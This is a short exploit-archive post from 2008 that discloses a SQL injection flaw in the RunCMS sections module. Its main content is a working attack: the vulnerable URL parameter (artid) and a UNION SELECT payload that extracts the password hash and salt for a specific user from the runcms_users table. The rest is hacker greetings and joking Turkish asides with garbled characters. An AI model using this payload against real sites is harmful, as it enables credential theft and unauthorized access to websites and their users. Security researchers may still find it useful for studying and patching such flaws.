RunCMS Module section (artid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RunCMS Module section (artid) Remote SQL Injection Vulnerability
# Published : 2008-03-20
# Author : Cr@zy_King
# Previous Title : XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit
# Next Title : ASPapp Knowledge Base Remote SQL Injection Vulnerability

Cr@zy_King

crazy_kinq@hotmail.co.uk / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql ?°nj. Vuln.

Example :

 - modules/sections/index.php?op=viewarticle&artid=Sql

 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Kurtlar Vadisinde Memati ?–lmeyecek kimse heyecanlanmas?±n :D

Alemin_Krali Says : Aynen kat?±l?±yorum (ne alaka ise a.q)

Good.

# www.Syue.com [2008-03-20]